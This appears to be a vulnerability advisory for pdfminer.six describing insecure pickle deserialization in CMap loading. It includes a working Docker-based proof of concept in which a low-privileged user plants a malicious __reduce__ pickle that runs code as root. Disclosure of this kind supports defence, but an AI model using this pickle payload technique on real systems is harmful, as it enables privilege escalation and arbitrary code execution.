- "details": "### Overview\n\nThis report **demonstrates a real-world privilege escalation** vulnerability in [pdfminer.six](https://github.com/pdfminer/pdfminer.six) due to unsafe usage of Python's `pickle` module for CMap file loading. \nIt shows how a low-privileged user can gain root access (or escalate to any service account) by exploiting insecure deserialization in a typical multi-user or server environment.\n\n## Table of Contents\n\n- [Background](#-background)\n- [Vulnerability Description](#-vulnerability-description)\n- [Demo Scenario](#-demo-scenario)\n- [Technical Details](#-technical-details)\n- [Setup and Usage](#-setup-and-usage)\n- [Step-by-step Walkthrough](#-step-by-step-walkthrough)\n- [Security Standards & References](#-security-standards--references)\n---\n\n## Background\n\n**pdfminer.six** is a popular Python library for extracting text and information from PDF files. It supports CJK (Chinese, Japanese, Korean) fonts via external CMap files, which it loads from disk using Python's `pickle` module.\n\n> **Security Issue:** \n> If the CMap search path (`CMAP_PATH` or default directories) includes a world-writable or user-writable directory, an attacker can place a malicious `.pickle.gz` file that will be loaded and deserialized by pdfminer.six, leading to arbitrary code execution.\n\n---\n\n### Vulnerability Description\n\n- **Component:** pdfminer.six CMap loading (`pdfminer/cmapdb.py`)\n- **Issue:** Loads and deserializes `.pickle.gz` files using Python’s `pickle` module, which is unsafe for untrusted data.\n- **Exploitability:** If a low-privileged user can write to any directory in `CMAP_PATH`, they can execute code as the user running pdfminer—potentially root or a privileged service.\n- **Impact:** Full code execution as the service user, privilege escalation from user to root, persistence, and potential lateral movement.\n\n### Demo Scenario\n\n**Environment:** \n- Alpine Linux (Docker container)\n- Two users: \n - `user1` (attacker: low-privilege)\n - `root` (victim: runs privileged PDF-processing script)\n- Shared writable directory: `/tmp/uploads`\n- `CMAP_PATH` set to `/tmp/uploads` for the privileged script\n- pdfminer.six installed system-wide\n\n**Attack Flow:** \n1. `user1` creates a malicious CMap file (`Evil.pickle.gz`) in `/tmp/uploads`.\n2. The privileged service (`root`) processes a PDF or calls `get_cmap(\"Evil\")`.\n3. The malicious pickle is deserialized, running arbitrary code as root.\n4. The exploit creates a flag file in `/root/pwnedByPdfminer` as proof.\n\n### Technical Details\n\n- **Vulnerability Type:** Insecure deserialization of untrusted data using Python's `pickle`\n- **Attack Prerequisites:** Attacker can write to a directory included in `CMAP_PATH`\n- **Vulnerable Line:** \n ```python\n return type(str(name), (), pickle.loads(gzfile.read()))\n ```\n *In `pdfminer/cmapdb.py`'s `_load_data` method*\n- https://github.com/pdfminer/pdfminer.six/blob/20250506/pdfminer/cmapdb.py#L246\n- **Proof of Concept:** See `createEvilPickle.py`, `evilmod.py`, and `processPdf.py`\n\n**Exploit Chain:**\n- Attacker places a malicious `.pickle.gz` file in the CMap search path.\n- Privileged process (e.g., root) loads a CMap, triggering pickle deserialization.\n- Arbitrary code executes with the privilege of the process (root/service account).\n\n## Setup and Usage\n\n### 📁 Files\n#### </> Dockerfile\n```yml\nFROM python:3.11-alpine\n\n# Install required packages and create users\nRUN adduser -D user1 && mkdir -p /tmp/uploads && chown user1:user1 /tmp/uploads\n\nWORKDIR /app\n\n# Install pdfminer.six\nRUN pip install --no-cache-dir pdfminer.six\n\n# Copy app files\nCOPY evilmod.py /app/evilmod.py\nCOPY createEvilPickle.py /app/createEvilPickle.py\nCOPY processPDF.py /app/processPDF.py\n\n# Set up permissions for demo\nRUN chmod 777 /tmp/uploads\n\n# Default: drop into a shell for demo instructions\nCMD [\"/bin/sh\"]\n```\n\n#### </> evilmod.py\n```python\nimport os\n\ndef evilFunc():\n with open(\"/root/pwnedByPdfminer\", \"w\") as f:\n f.write(\"ROOTED by pdfminer pickle RCE\\n\")\n return {\"CODE2CID\": {}, \"IS_VERTICAL\": False}\n```\n#### </> createEvilPickle.py\n```python\nimport pickle\nimport gzip\nfrom evilmod import evilFunc\n\nclass Evil:\n def __reduce__(self):\n return (evilFunc, ())\n\npayload = pickle.dumps(Evil())\nwith gzip.open(\"/tmp/uploads/Evil.pickle.gz\", \"wb\") as f:\n f.write(payload)\n\nprint(\"Malicious pickle created at /tmp/uploads/Evil.pickle.gz\")\n```\n#### </> processPDF.py\n```python\nimport os\nfrom pdfminer.cmapdb import CMapDB\n\nos.environ[\"CMAP_PATH\"] = \"/tmp/uploads\"\n\nCMapDB.get_cmap(\"Evil\")\n\nprint(\"CMap loaded. If vulnerable, /root/pwnedByPdfminer will be created.\")\n```\n\n### Build and start the demo container\n\n```bash\ndocker build -t pdfminer-priv-esc-demo .\ndocker run --rm -it --name pdfminer-demo pdfminer-priv-esc-demo\n```\n\n### In the container, open two shells in parallel (or switch users in one):\n\n#### Shell 1 (Attacker: user1)\n```bash\nsu user1\ncd /app\npython createEvilPickle.py\n# Confirms: /tmp/uploads/Evil.pickle.gz is created and owned by user1\n```\n\n#### Shell 2 (Victim: root)\n```bash\ncd /app\npython processPdf.py\n# Output: If vulnerable, /root/pwnedByPdfminer will be created\n```\n\n### Proof of escalation\n\n```bash\ncat /root/pwnedByPdfminer\n# 🏴 Output: ROOTED by pdfminer pickle RCE\n```\n\n## Step-by-step Walkthrough\n\n1. **user1** uses `createEvilPickle.py` to craft and place a malicious CMap pickle in a shared upload directory.\n2. The **root** user runs a typical PDF-processing script, which loads CMap files from that directory.\n3. The exploit triggers, running arbitrary code as root.\n4. The attacker now has proof of code execution as root (and, in a real attack, could escalate further).\n\n## Security Standards & References\n\n- **OWASP Top 10:** \n - [A08:2021 - Software and Data Integrity Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures/)\n - [A03:2021 - Injection](https://owasp.org/Top10/A03_2021-Injection/) (by analogy, as it's code injection via deserialization)\n\n- **MITRE ATT&CK Techniques:** \n - [T1055: Process Injection](https://attack.mitre.org/techniques/T1055/)\n - [T1548: Abuse Elevation Control Mechanism](https://attack.mitre.org/techniques/T1548/)\n\n\n",
0 commit comments